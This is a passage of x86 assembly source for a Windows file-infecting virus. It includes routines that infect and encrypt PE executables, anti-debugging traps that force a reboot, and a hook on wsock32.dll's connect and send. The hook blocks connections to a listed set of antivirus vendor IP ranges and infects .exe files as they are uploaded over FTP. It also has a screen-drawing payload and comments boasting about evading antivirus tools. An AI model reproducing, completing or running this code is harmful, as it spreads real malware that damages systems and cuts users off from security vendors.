|
||
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
jne @write_it
|
||
mov ecx,hooksize
|
||
|
||
|
||
lea esi,[ebp+start_h]
|
||
|
||
|
||
@write_it:
|
||
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
je step_0
|
||
call @crypt_my_body
|
||
jmp step_1
|
||
step_0: rep movsb ;Do it!
|
||
|
||
|
||
step_1:
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
jne _Git
|
||
ret
|
||
|
||
_Git:
|
||
jmp _God
|
||
|
||
|
||
_No_infect:
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
jne @zw
|
||
mov edx,-1
|
||
jmp _God
|
||
|
||
@zw:
|
||
mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
|
||
call @zostaf
|
||
dec dword ptr [ebp+ic]
|
||
|
||
|
||
_God:
|
||
|
||
mov eax,[ebp+offset fMapReal]
|
||
push eax
|
||
mov eax, [ebp+_UnmapViewOfFile]
|
||
call eax
|
||
|
||
|
||
|
||
_Out3:
|
||
push dword ptr [ebp+fHndMap]
|
||
call dword ptr [ebp+_CloseHandle]
|
||
|
||
|
||
|
||
|
||
|
||
_Out2:
|
||
lea eax,[ebp+F1]
|
||
push eax
|
||
lea eax,[ebp+F2]
|
||
push eax
|
||
lea eax,[ebp+F3]
|
||
push eax
|
||
push dword ptr [ebp+fHnd]
|
||
call dword ptr [ebp+_SetFileTime]
|
||
|
||
push dword ptr [ebp+offset fileHandle]
|
||
call dword ptr [ebp+_CloseHandle]
|
||
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
je @@@z
|
||
push 1
|
||
lea eax,[ebp+santa]
|
||
push eax
|
||
lea eax,[ebp+finddata.cFileName]
|
||
push eax
|
||
call dword ptr [ebp+_CopyFileA]
|
||
|
||
@@@z:
|
||
;&resetore the attributez
|
||
push dword ptr [ebp+fileAtrib]
|
||
lea eax,[ebp+finddata.cFileName]
|
||
push eax
|
||
call dword ptr [ebp+_SetFileAttributesA]
|
||
mov edx,-1
|
||
|
||
|
||
_Out:
|
||
|
||
ret
|
||
|
||
|
||
|
||
Align_:
|
||
push edx
|
||
xor edx,edx
|
||
push eax
|
||
div ecx
|
||
pop eax
|
||
sub ecx,edx
|
||
add eax,ecx
|
||
pop edx
|
||
ret
|
||
|
||
|
||
|
||
|
||
|
||
@zostaf:
|
||
xor eax,eax
|
||
push eax
|
||
push eax
|
||
push ecx
|
||
push dword ptr [ebp+fileHandle]
|
||
call dword ptr [ebp+offset _SetFilePointer]
|
||
|
||
push dword ptr [ebp+fileHandle]
|
||
call dword ptr [ebp+offset _SetEndOfFile]
|
||
ret
|
||
|
||
;**************************
|
||
;ECX - size to map
|
||
;**************************
|
||
MapF:
|
||
xor eax,eax
|
||
push eax
|
||
push ecx
|
||
push eax
|
||
push 00000004h
|
||
push eax
|
||
push dword ptr [ebp+fileHandle]
|
||
call dword ptr [ebp+_CreateFileMappingA]
|
||
cmp eax,0
|
||
je _Out2
|
||
mov dword ptr [ebp+fHndMap],eax
|
||
ret
|
||
|
||
|
||
VMapF:
|
||
xor eax,eax
|
||
push ecx
|
||
push eax
|
||
push eax
|
||
push 00000004h OR 00000002h
|
||
push dword ptr [ebp+fHndMap]
|
||
call dword ptr [ebp+_MapViewOfFile]
|
||
cmp eax,0
|
||
je _Out3
|
||
mov dword ptr [ebp+fMapReal],eax
|
||
mov esi,eax
|
||
ret
|
||
|
||
@TRY_RELOC:
|
||
ret
|
||
|
||
@debug_trap: ;ret
|
||
call dword ptr [ebp+_IsDebuggerPresent]
|
||
or eax,eax
|
||
jz _leave_me
|
||
ble: mov eax, 909119cdh ;int 19h!
|
||
jmp $ - 4
|
||
|
||
|
||
_leave_me:
|
||
lea eax,[ebp+sice9x]
|
||
push 00000000h
|
||
push 00000080h
|
||
push 00000003h
|
||
push 00000000h
|
||
push 00000001h
|
||
push 0C0000000h
|
||
push eax
|
||
call dword ptr [ebp+_CreateFileA]
|
||
|
||
inc eax
|
||
jz leave_it
|
||
dec eax
|
||
|
||
push eax
|
||
call dword ptr [ebp+_CloseHandle]
|
||
|
||
lea eax,[ebp+to_ja]
|
||
push eax
|
||
call dword ptr [ebp+_OutputDebugStringA]
|
||
mov eax, 909119cdh ;int 19h!
|
||
jmp $ - 4
|
||
jmp @EXIT
|
||
|
||
leave_it: ret
|
||
|
||
|
||
|
||
;************************************************************************************************
|
||
;PayL0ad ;]
|
||
;this is very simple coz i don't have any time to make it perfect
|
||
;************************************************************************************************
|
||
payload:
|
||
p_x dd 0
|
||
p_y dd 0
|
||
|
||
hdc dd 0
|
||
wh dd 0
|
||
|
||
screen_x dd 0
|
||
screen_y dd 0
|
||
|
||
|
||
font dd 0
|
||
|
||
|
||
color: dd 15466513
|
||
dd 15474944
|
||
dd 15484928
|
||
dd 15496448
|
||
|
||
|
||
|
||
make_it_real:
|
||
pay:
|
||
|
||
lea esi,[ebp+@GDI_APIZ]
|
||
lea edi,[ebp+@GDI_APIZA]
|
||
lea ebx,[ebp+gdi32]
|
||
|
||
change_l:
|
||
push ebx
|
||
call dword ptr [ebp+_LoadLibraryA]
|
||
mov ebx,eax
|
||
|
||
|
||
@find_a:
|
||
push esi
|
||
push ebx
|
||
call dword ptr [ebp+_GPA]
|
||
stosd
|
||
|
||
check_a:
|
||
inc esi
|
||
cmp byte ptr [esi],0
|
||
jne check_a
|
||
|
||
inc esi
|
||
cmp byte ptr [esi],77h
|
||
je change_ll
|
||
|
||
cmp byte ptr [esi],69h
|
||
je @go_pay
|
||
|
||
jmp @find_a
|
||
|
||
|
||
change_ll: inc esi
|
||
lea ebx,[ebp+user32]
|
||
jmp change_l
|
||
|
||
|
||
@go_pay:
|
||
|
||
|
||
push 1
|
||
call dword ptr [ebp+_GetSystemMetrics] ;user
|
||
mov dword ptr [ebp+screen_y],eax
|
||
|
||
push 0
|
||
call dword ptr [ebp+_GetSystemMetrics] ;user
|
||
mov dword ptr [ebp+screen_x],eax
|
||
|
||
call c_font
|
||
lea esi,logo
|
||
xor ebx,ebx
|
||
|
||
l:
|
||
call dword ptr [ebp+_GetDesktopWindow] ;user
|
||
mov dword ptr [ebp+wh],eax
|
||
|
||
push dword ptr [ebp+wh]
|
||
call dword ptr [ebp+_GetWindowDC] ;user
|
||
mov dword ptr [ebp+hdc],eax
|
||
|
||
call draww
|
||
|
||
push dword ptr [ebp+hdc]
|
||
push dword ptr [ebp+wh]
|
||
call dword ptr [ebp+_ReleaseDC] ;user
|
||
|
||
jmp l
|
||
|
||
draww:
|
||
xor eax,eax
|
||
lodsb
|
||
lea edi,[ebp+jed]
|
||
stosb
|
||
cmp al,0
|
||
jne @wypisz
|
||
lea esi,[ebp+logo]
|
||
lodsb
|
||
lea edi,[ebp+jed]
|
||
stosb
|
||
|
||
@wypisz:
|
||
cmp al,'i'
|
||
jne @dik
|
||
add dword ptr [ebp+p_x],6
|
||
|
||
@dik:
|
||
push dword ptr [ebp+font]
|
||
push dword ptr [ebp+hdc]
|
||
call dword ptr [ebp+_SelectObject] ;gdi
|
||
|
||
push 0
|
||
push dword ptr [ebp+hdc]
|
||
call dword ptr [ebp+_SetBkMode] ;gdi
|
||
|
||
mov eax,dword ptr [ebp+color+ebx]
|
||
add ebx,4
|
||
cmp ebx,4*4
|
||
jl @n1
|
||
xor ebx,ebx
|
||
|
||
@n1:
|
||
push eax
|
||
push dword ptr [ebp+hdc]
|
||
call dword ptr [ebp+_SetTextColor] ;gdi
|
||
|
||
push 1
|
||
lea eax,[ebp+jed]
|
||
push eax
|
||
push dword ptr [ebp+p_y]
|
||
push dword ptr [ebp+p_x]
|
||
push dword ptr [ebp+hdc]
|
||
call dword ptr [ebp+_TextOutA] ;gdi
|
||
|
||
mov eax,dword ptr [ebp+screen_y]
|
||
cmp dword ptr [ebp+p_y],eax
|
||
jae chang_g
|
||
mov eax,dword ptr [ebp+screen_x]
|
||
add dword ptr [ebp+p_x],13
|
||
cmp dword ptr [ebp+p_x],eax
|
||
jle spp
|
||
mov dword ptr [ebp+p_x],0
|
||
add dword ptr [ebp+p_y],15
|
||
jmp spp
|
||
|
||
chang_g: mov dword ptr [ebp+p_y],0
|
||
|
||
spp:
|
||
push 50
|
||
call dword ptr [ebp+_Sleep]
|
||
ret
|
||
|
||
c_font:
|
||
push offset famil
|
||
xor eax,eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
push 9
|
||
push 9
|
||
call dword ptr [ebp+_CreateFontA] ;gdi
|
||
mov [font],eax
|
||
ret
|
||
|
||
|
||
|
||
|
||
@GDI_APIZ: db "CreateFontA",0
|
||
db "TextOutA",0
|
||
db "SetBkMode",0
|
||
db "SetTextColor",0
|
||
db "SelectObject",0
|
||
db 77h
|
||
db "GetSystemMetrics",0 ;user32 part X-D
|
||
db "GetDesktopWindow",0
|
||
db "GetWindowDC",0
|
||
db "ReleaseDC",0
|
||
db 69h
|
||
|
||
|
||
;************************************************************************************************
|
||
;Handle this sucker ;]
|
||
;************************************************************************************************
|
||
@crypt_host:
|
||
;push dword ptr [ebp+key_next]
|
||
pushad
|
||
|
||
mov eax,dword ptr [ebp+fMapReal]
|
||
mov esi,[eax+3ch]
|
||
add esi,eax ;ESI => PE HEADER
|
||
mov edi,esi
|
||
|
||
xor eax,eax
|
||
mov ax,[esi + 06h] ;load number of sections
|
||
mov ecx,0h ;28 bytes for each section header
|
||
|
||
add esi,ecx ; Normalize
|
||
add esi,78h ; Ptr to dir table
|
||
mov edx,[edi+74h] ; EDX = n§ of dir entries
|
||
shl edx,3 ; EDX = EDX*8
|
||
add esi,edx ; ESI = Ptr to last section
|
||
|
||
mov ecx,[edi+28h]
|
||
|
||
search_it:
|
||
mov ebx,dword ptr [esi+0ch]
|
||
add ebx,dword ptr [esi+08h]
|
||
|
||
|
||
|
||
inc eax
|
||
cmp ecx,ebx
|
||
jb sfound
|
||
dec eax
|
||
jz @e_error
|
||
add esi,28h
|
||
jmp search_it
|
||
|
||
sfound:
|
||
test dword ptr [esi+24h],10000000h ;check section atributes
|
||
jnz @e_error
|
||
or dword ptr [esi+24h],0A0000020h
|
||
|
||
cmp dword ptr [esi],'xet.'
|
||
je _01
|
||
cmp dword ptr [esi],'EDOC'
|
||
je _01
|
||
mov dword ptr [ebp+help_virus],1
|
||
|
||
|
||
|
||
_01:
|
||
push eax
|
||
;STEP GET RAW ADDRESS
|
||
|
||
mov edx,ecx
|
||
sub edx,dword ptr [esi+0ch] ;IMAGEBASE - VIRTUAL RVA=0
|
||
add edx,[esi+014h] ;ADD RAW OFFSET
|
||
mov dword ptr [ebp+e_where],edx
|
||
|
||
push edx
|
||
mov edx,[esi+010h]
|
||
mov dword ptr [ebp+e_bytes],edx
|
||
pop edx
|
||
|
||
add edx,dword ptr [ebp+fMapReal] ;WHERE TO CRYPT!
|
||
|
||
mov ecx,[esi+10h]
|
||
mov dword ptr [ebp+e_god],0
|
||
|
||
mov dword ptr [ebp+firstk],1h
|
||
|
||
pushad
|
||
|
||
lea edi,[ebp+key_next]
|
||
|
||
call @GGEN_KEY
|
||
call @combine_key
|
||
|
||
mov eax,dword ptr [ebp+key_next]
|
||
|
||
popad
|
||
mov dword ptr [ebp+firstk],0
|
||
|
||
push esi
|
||
mov eax,dword ptr [ebp+key_next]
|
||
xor ebx,ebx
|
||
|
||
|
||
@loop_it:
|
||
;=> IF 5 BYTES ARE ZEROZ THEN THE DON't CRYPT BELOW
|
||
cmp byte ptr [edx],00h
|
||
jne @go_
|
||
cmp byte ptr [edx+1],00h
|
||
jne @go_
|
||
cmp byte ptr [edx+2],00h
|
||
jne @go_
|
||
cmp byte ptr [edx+3],00h
|
||
jne @go_
|
||
cmp byte ptr [edx+4],00h
|
||
je @crypted
|
||
|
||
|
||
@go_:
|
||
xor byte ptr [edx],al
|
||
|
||
inc edx
|
||
loop @loop_it
|
||
jmp @e_out
|
||
|
||
@crypted:
|
||
pop esi
|
||
mov eax,dword ptr [ebp+e_bytes]
|
||
sub eax,ecx
|
||
mov dword ptr [ebp+e_bytes],eax
|
||
|
||
jmp @e_out
|
||
|
||
|
||
@e_error:
|
||
|
||
|
||
@e_out:
|
||
pop eax
|
||
cmp dword ptr [ebp+help_virus],1
|
||
je @mute_other_virus
|
||
popad
|
||
ret
|
||
|
||
;ENTRY: EDI - BUFFER
|
||
@combine_key:
|
||
mov eax,dword ptr [ebp+key2]
|
||
stosd
|
||
add eax,dword ptr [ebp+key]
|
||
lea edi,[ebp+key_main]
|
||
stosd
|
||
ret
|
||
|
||
;**************************************************************************
|
||
;UNCRYPT *|*
|
||
;**************************************************************************
|
||
@uncrypt:
|
||
|
||
call delta_e
|
||
delta_e: pop ebp
|
||
sub ebp,offset delta_e
|
||
|
||
pushad
|
||
mov edx,dword ptr [ebp+imagebase]
|
||
add edx,dword ptr [ebp+hosteip]
|
||
|
||
mov ecx,dword ptr [ebp+e_bytes]
|
||
|
||
xor ebx,ebx
|
||
mov eax,[ebp+key_next]
|
||
|
||
@lloop_it:
|
||
xor byte ptr [edx],al
|
||
inc edx
|
||
loop @lloop_it
|
||
|
||
f_e:
|
||
cmp dword ptr [ebp+czy_je],0
|
||
jne @helper_endd
|
||
popad
|
||
ret
|
||
|
||
@helper_endd:
|
||
popad
|
||
|
||
mov eax,dword ptr [ebp+hosteip]
|
||
add eax,dword ptr [ebp+imagebase]
|
||
jmp eax
|
||
|
||
|
||
czy_je dd 0
|
||
e_bytes dd 0
|
||
e_where dd 0
|
||
e_god dd 0
|
||
|
||
|
||
hosteip dd 0
|
||
imagebase dd 0
|
||
key_next dd 0
|
||
|
||
|
||
@helper_end: nop
|
||
|
||
;***********************************************************
|
||
@mute_other_virus:
|
||
mov eax,dword ptr [ebp+fMapReal]
|
||
mov esi,[eax+3ch]
|
||
add esi,eax ;ESI => PE HEADER
|
||
mov edi,esi
|
||
|
||
xor eax,eax
|
||
mov ax,[esi + 06h] ;load number of sections
|
||
mov ecx,28h ;28 bytes for each section header
|
||
dec eax ;seeking for last,...
|
||
mul ecx ;and mul it
|
||
add esi,eax ; Normalize
|
||
add esi,78h ; Ptr to dir table
|
||
mov edx,[edi+74h] ; EDX = n§ of dir entries
|
||
shl edx,3 ; EDX = EDX*8
|
||
add esi,edx ; ESI = Ptr to last section
|
||
|
||
mov edx,[esi+10h] ; EDX = SizeOfRawData
|
||
mov ebx,edx ; EBX = EDX
|
||
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
|
||
|
||
push edx ; Preserve EDX
|
||
|
||
mov eax,ebx ; EAX = EBX
|
||
add eax,[esi+0Ch] ; EAX = EAX+VA Address
|
||
; EAX = New EIP
|
||
mov [edi+28h],eax ; Change the new EIP
|
||
mov dword ptr [ebp+NewEIP],eax ; Also store it
|
||
|
||
|
||
mov eax,dword ptr [ebp+fSize]
|
||
add eax,helper
|
||
mov ecx,[edi+3Ch]
|
||
call Align_
|
||
|
||
mov [esi+10h],eax
|
||
mov [esi+08h],eax
|
||
|
||
pop edx
|
||
|
||
mov eax,[esi+10h]
|
||
add eax,[esi+0Ch]
|
||
mov [edi+50h],eax
|
||
|
||
lea esi,[ebp+@uncrypt] ; ESI = Ptr to virus_start
|
||
xchg edi,edx ; EDI = Raw ptr after last
|
||
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
|
||
mov ecx,helper
|
||
mov dword ptr [ebp+czy_je],1
|
||
rep movsb
|
||
|
||
push dword ptr [ebp+offset fMapReal]
|
||
call dword ptr [ebp+_UnmapViewOfFile]
|
||
|
||
push dword ptr [ebp+fHndMap]
|
||
call dword ptr [ebp+_CloseHandle]
|
||
|
||
mov ecx,dword ptr [ebp+fSize]
|
||
add ecx,helper
|
||
call @zostaf
|
||
|
||
|
||
push dword ptr [ebp+fHnd]
|
||
call dword ptr [ebp+_CloseHandle]
|
||
|
||
popad
|
||
ret
|
||
|
||
|
||
;************************************************************************************************
|
||
;Wsock32 hooker!!!
|
||
;************************************************************************************************
|
||
@wsockz:
|
||
mov eax,dword ptr [ebp+_GetSystemDirectoryA]
|
||
mov ebx,dword ptr [ebp+_GPA]
|
||
|
||
push 260
|
||
lea eax,[ebp+sysDIR]
|
||
push eax
|
||
call dword ptr [ebp+_GetSystemDirectoryA]
|
||
|
||
lea eax,[ebp+offset winDIRr]
|
||
push 260
|
||
push eax
|
||
call dword ptr [ebp+_GetWindowsDirectoryA]
|
||
|
||
|
||
|
||
lea edi,[ebp+sysDIR]
|
||
lea esi,[ebp+wsock]
|
||
call strcat
|
||
|
||
lea edi,[ebp+winDIRr]
|
||
lea esi,[ebp+nowe]
|
||
call strcat
|
||
|
||
push 1
|
||
lea eax,[ebp+winDIRr]
|
||
push eax
|
||
lea eax,[ebp+sysDIR]
|
||
push eax
|
||
call dword ptr [ebp+_CopyFileA]
|
||
cmp eax,0
|
||
je bye
|
||
|
||
|
||
lea edi,[ebp+finddata.cFileName]
|
||
lea esi,[ebp+winDIRr]
|
||
call strcat
|
||
|
||
|
||
mov dword ptr [ebp+go_wsock],1
|
||
|
||
push dword ptr [ebp+hosteip]
|
||
push dword ptr [ebp+imagebase]
|
||
call @infect
|
||
pop dword ptr [ebp+imagebase]
|
||
pop dword ptr [ebp+hosteip]
|
||
cmp edx,-1
|
||
je bye
|
||
|
||
mov dword ptr [ebp+capis],0
|
||
mov eax,dword ptr [ebp+fMapReal]
|
||
mov dword ptr [ebp+wsock_h],eax
|
||
|
||
call @go_export
|
||
|
||
call _God
|
||
|
||
|
||
mov dword ptr [ebp+go_wsock],0
|
||
|
||
lea eax,[ebp+WININIT]
|
||
push eax
|
||
lea eax,[ebp+winDIRr]
|
||
push eax
|
||
lea eax,[ebp+sysDIR]
|
||
push eax
|
||
lea eax,[ebp+rename]
|
||
push eax
|
||
call dword ptr [ebp+_WritePrivateProfileStringA]
|
||
|
||
|
||
|
||
|
||
bye: ret
|
||
|
||
|
||
;************************************************************************************************
|
||
;STRCAT !!! Its smaller and faster (i think - but non optimized with repz)
|
||
;ENTRY:
|
||
;edi - base buffer
|
||
;esi - string to cut
|
||
;************************************************************************************************
|
||
strcat:
|
||
push esi
|
||
mov esi,edi
|
||
sstrcat: lodsb
|
||
cmp al,0
|
||
jne sstrcat
|
||
dec esi
|
||
mov edi,esi
|
||
pop esi
|
||
cat_it:
|
||
lodsb
|
||
cmp al,0
|
||
je le
|
||
stosb
|
||
jmp cat_it
|
||
le:ret
|
||
|
||
|
||
;************************************************************************************************
|
||
;Filez with 'a','A','E','e','v','V' at start - wouldn't be infected ;]
|
||
;************************************************************************************************
|
||
|
||
@bad_name:
|
||
xor edi,edi
|
||
lea esi,[ebp+finddata.cFileName]
|
||
_letra:
|
||
lodsb
|
||
cmp al,'a'
|
||
je error_a
|
||
cmp al,'A'
|
||
je error_a
|
||
cmp al,'E'
|
||
je error_a
|
||
cmp al,'e'
|
||
je error_a
|
||
cmp al,'v'
|
||
je error_a
|
||
cmp al,'V'
|
||
je error_a
|
||
ret
|
||
|
||
error_a: inc edi
|
||
ret
|
||
|
||
;================================================================================================
|
||
;BYTE CRYPTING ENGINE ;] SIMPLE BUT FACKING AVERZ
|
||
;================================================================================================
|
||
|
||
@GGEN_KEY:
|
||
cmp dword ptr [ebp+firstk],1
|
||
jne @go__
|
||
mov ebx,40h
|
||
mov dword ptr [ebp+key2],0h
|
||
jmp GEN_KEY
|
||
|
||
@go__:
|
||
mov dword ptr [ebp+offset key],0000000h
|
||
mov ebx,55h
|
||
GEN_KEY:
|
||
call dword ptr [ebp+_GetTickCount]
|
||
idiv ebx ;w EDX reszta ;) duzo prostszy algorymt zwracania losowych
|
||
cmp edx,ebx ;liczb niz ten T2000-Immortal Riota
|
||
jae GEN_KEY
|
||
inc edx ;MUSIMY COS SKODOWAC CHOCIAZ O +1
|
||
cmp dword ptr [ebp+firstk],1
|
||
je @go___
|
||
mov dword ptr [ebp+offset key],edx
|
||
@go___: mov dword ptr [ebp+offset key2],edx
|
||
ret
|
||
|
||
|
||
|
||
@CRYPT_BYTEZ:
|
||
mov ecx,edx
|
||
|
||
Try_crypt:
|
||
lodsb ;czytamy bajta qrwa :P jest w AL
|
||
cmp al,0
|
||
je _zero
|
||
cmp al,07h
|
||
je _retprog
|
||
|
||
_next: add al,cl
|
||
stosb
|
||
jmp Try_crypt
|
||
|
||
_zero: inc edi
|
||
jmp Try_crypt
|
||
|
||
_retprog: ret
|
||
|
||
|
||
|
||
|
||
@UN_CRYPT_BYTEZ:
|
||
mov ecx,dword ptr [ebp+offset key]
|
||
Try_uncrypt:
|
||
lodsb
|
||
cmp al,0h
|
||
je _zero0
|
||
cmp al,07h
|
||
je ret0
|
||
|
||
|
||
_next0: sub al,cl
|
||
stosb
|
||
jmp Try_uncrypt
|
||
|
||
_zero0: inc edi
|
||
jmp Try_uncrypt
|
||
|
||
|
||
ret0: ret
|
||
|
||
|
||
|
||
;================================================================================================
|
||
;HOOKER DATA
|
||
;================================================================================================
|
||
start_h:
|
||
hooked_connect:
|
||
call get_delta
|
||
|
||
|
||
pushad
|
||
|
||
|
||
mov edx,[esp+(10*4)] ; EDX = sockaddr
|
||
mov ecx,[edx+(2*2)] ; ip
|
||
shl ecx,8 ; last octet
|
||
|
||
lea esi,[eax+DENIED]
|
||
mov edi,eax ;save EAX in EDI
|
||
|
||
scan_denied: lodsd
|
||
dec esi
|
||
shl eax,8
|
||
jz TOC
|
||
cmp ecx,eax
|
||
jne scan_denied
|
||
push WSAHOST_NOT_FOUND
|
||
call dword ptr [edi+_WSASetLastError]
|
||
popad
|
||
push -1
|
||
pop eax
|
||
jmp out_c
|
||
|
||
|
||
TOC: ;tHe oRgInal coNneCt ;]
|
||
popad
|
||
push [esp+0Ch] ;int namelen
|
||
push [esp+4+8] ;const struct sockaddr FAR* name
|
||
push [esp+8+4] ;SOCKET s
|
||
call dword ptr [eax+a_connect] ;call orginal connect!!!
|
||
|
||
out_c: retn 0Ch
|
||
|
||
;//////////////////////////////////////////////hooked send///////////////////////////////////////
|
||
hooked_send:
|
||
call get_delta
|
||
pushad
|
||
mov edi,eax
|
||
mov ebx,[esp+28h] ;20(PUSHAD)+8(FAR *buf)
|
||
|
||
mov eax,[ebx]
|
||
|
||
cmp eax,'ROTS' ;FTP: Storing a file ? ;)
|
||
je _ftp_store
|
||
|
||
TOS:
|
||
popad ;tHe oRgInaL sEnd
|
||
push [esp+10h] ;int flags
|
||
push [esp+4+0Ch] ;int len
|
||
push [esp+8+8] ;const char FAR * buf
|
||
push [esp+0Ch+4] ;SOCKET s
|
||
call dword ptr [eax+a_send] ;call orginal send!!!
|
||
|
||
|
||
out_s: retn 10h
|
||
|
||
_ftp_store: ;yeah! infect on tha fly
|
||
mov edx,[esp+28h] ;point to name =]
|
||
add edx,5 ;skip STOR and one space (5 bytes)
|
||
|
||
mov esi,[esp+28h]
|
||
@loop:
|
||
lodsb
|
||
cmp al,'.' ;find first dod
|
||
jne @loop
|
||
|
||
dec esi
|
||
mov esi,[esi] ;a exe file!?
|
||
cmp esi,'EXE.'
|
||
je try_it
|
||
cmp esi,'exe.'
|
||
je try_it
|
||
jmp TOS
|
||
|
||
|
||
try_it:
|
||
mov ecx,edi
|
||
lea edi,[ecx+offset buff]
|
||
mov esi,edx
|
||
xor edx,edx
|
||
_l:
|
||
lodsb
|
||
cmp al,0dh
|
||
je _end
|
||
stosb
|
||
inc edx
|
||
jmp _l
|
||
|
||
mov edi,edx
|
||
|
||
_end:
|
||
lea edx,[ecx+offset buff]
|
||
lea ebx,[ecx+offset inf_prog]
|
||
|
||
push ecx ;preserve ecx
|
||
push ebx
|
||
push 260
|
||
call dword ptr [ecx+gcd] ;tricky ;] GetCurrentDirectory
|
||
;ftp clients use that to locate
|
||
;file.
|
||
pop ecx ;load ecx
|
||
|
||
mov eax,edi
|
||
xor ebx,ebx
|
||
lea esi,[ecx+offset inf_prog]
|
||
|
||
_loop_1:
|
||
lodsb
|
||
inc ebx
|
||
cmp al,0
|
||
jne _loop_1
|
||
|
||
_do:
|
||
lea edi,[ecx+offset inf_prog] ;add \ to patch ;]
|
||
add edi,ebx
|
||
dec edi
|
||
mov al,'\'
|
||
stosb
|
||
lea esi,[ecx+offset buff]
|
||
|
||
_l2: ;well optimised strcat
|
||
lodsb
|
||
cmp al,0
|
||
je _skipp
|
||
stosb
|
||
jmp _l2
|
||
|
||
_skipp:
|
||
lea esi,[ecx+offset santa]
|
||
lea edi,[ecx+offset inf_prog2]
|
||
_cat:
|
||
lodsb
|
||
cmp al,0
|
||
je _catt
|
||
stosb
|
||
jmp _cat
|
||
|
||
_catt:
|
||
mov al,' '
|
||
stosb
|
||
|
||
lea esi,[ecx+offset inf_prog]
|
||
_make_real:
|
||
lodsb
|
||
cmp al,0
|
||
je done
|
||
stosb
|
||
jmp _make_real
|
||
|
||
done:
|
||
mov edi,ecx
|
||
|
||
push 1
|
||
lea eax,[edi+offset inf_prog2]
|
||
push eax
|
||
call dword ptr [edi+wex]
|
||
|
||
jmp TOS
|
||
|
||
|
||
reset_err: push WSAECONNRESET
|
||
call dword ptr [edi+_WSASetLastError]
|
||
popad
|
||
push -1
|
||
pop eax
|
||
jmp out_s
|
||
;/*END-------------------------------------------------------------------------------------------
|
||
get_delta:
|
||
call @hookerdelta
|
||
@hookerdelta:
|
||
pop eax
|
||
sub eax,offset @hookerdelta
|
||
ret
|
||
|
||
|
||
my_data:
|
||
a_send dd 0
|
||
a_connect dd 0
|
||
|
||
msgg dd 0BFF44146h
|
||
|
||
DO_WPISU: _WSASetLastError dd 0
|
||
wex dd 0
|
||
gcd dd 0
|
||
|
||
|
||
WSAHOST_NOT_FOUND equ 11001
|
||
WSAECONNRESET equ 10054
|
||
|
||
|
||
buff db 110 dup (0)
|
||
inf_prog2 db 260 dup (0)
|
||
inf_prog db 260 dup (0)
|
||
santa db 'C:\Program Files\deithwen.exe',0
|
||
;santa db 'C:\WINDOWS\CALC.EXE',0
|
||
|
||
;***********DENIED LIST*************************************************************************
|
||
;thx goez to T-2000/Immortal Riot ;]
|
||
|
||
DENIED: DB 161,069,003 ; nai.com
|
||
DB 216,122,008 ; avp.com
|
||
DB 195,170,248 ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru
|
||
DB 193,247,150 ; avp.ch, metro.ch
|
||
DB 194,252,006 ; datafellows.com, f-secure.com
|
||
DB 195,112,025 ; drsolomon.com
|
||
DB 208,228,231 ; mcafee.com
|
||
DB 194,203,134 ; sophos.com
|
||
DB 146,145,148 ; norman.com
|
||
DB 206,204,003 ; pandasoftware.com
|
||
DB 193,004,210 ; complex.is
|
||
DB 203,037,250 ; leprechaun.com.au
|
||
DB 141,202,248 ; cai.com
|
||
DB 216,033,022 ; antivirus.com, trendmicro.com
|
||
DB 216,035,137 ; sarc.com
|
||
DB 216,086,104 ; virus.com
|
||
DB 212,029,228 ; invircible.com
|
||
DB 208,226,167 ; symantec.com
|
||
DB 207,227,040 ; grisoft.com
|
||
DB 194,105,193 ; drweb.ru
|
||
DB 000,000,000 ; end of table.
|
||
|
||
hook_end label byte
|
||
;________________________________________________________________________________________________
|
||
;============================================================================================DATA
|
||
;________________________________________________________________________________________________
|
||
|
||
;**APIZ TO HOOK**
|
||
A1 db 'send',0
|
||
A1s equ $-A1
|
||
A2 db 'connect',0
|
||
A2s equ $-A2
|
||
|
||
|
||
|
||
|
||
e_esi dd 0
|
||
|
||
APIS db 'GetProcAddress',0
|
||
APIS_SIZE = $ - APIS
|
||
|
||
|
||
APIList: db "FindFirstFileA",0
|
||
db "FindNextFileA",0
|
||
db "FindClose",0
|
||
db "SetFileAttributesA",0
|
||
db "SetFileTime",0
|
||
db "CreateFileA",0
|
||
db "CreateFileMappingA",0
|
||
db "MapViewOfFile",0
|
||
db "UnmapViewOfFile",0
|
||
db "GetFileTime",0
|
||
db "GetFileSize",0
|
||
db "GetFileAttributesA",0
|
||
db "SetFileAttributesA",0
|
||
db "ReadFile",0
|
||
db "WriteFile",0
|
||
db "SetFilePointer",0
|
||
db "SetEndOfFile",0
|
||
db "CloseHandle",0
|
||
db "SetCurrentDirectoryA",0
|
||
db "GetWindowsDirectoryA",0
|
||
db "GetSystemDirectoryA",0
|
||
db "CopyFileA",0
|
||
db "ExitProcess",0
|
||
db "GetTickCount",0
|
||
db "GetCommandLineA",0
|
||
db "IsDebuggerPresent",0
|
||
db "OutputDebugStringA",0
|
||
db "WinExec",0
|
||
db "LoadLibraryA",0
|
||
db "GetModuleHandleA",0
|
||
db "Sleep",0
|
||
db "GetSystemTime",0
|
||
db "WritePrivateProfileStringA",0
|
||
db "VirtualAlloc",0
|
||
db "VirtualFree",0
|
||
db "GetCurrentDirectoryA",0,07h ;07h stops the looking up
|
||
|
||
msg dd 0BFF44146h
|
||
|
||
key dd 0
|
||
|
||
;shit7 db "w.dll",0
|
||
|
||
marker db 'sru.exe',0
|
||
;marker db '*.exe',0
|
||
|
||
|
||
|
||
TO_CRYPT_DATA: to_ja: db 0ah,0dh
|
||
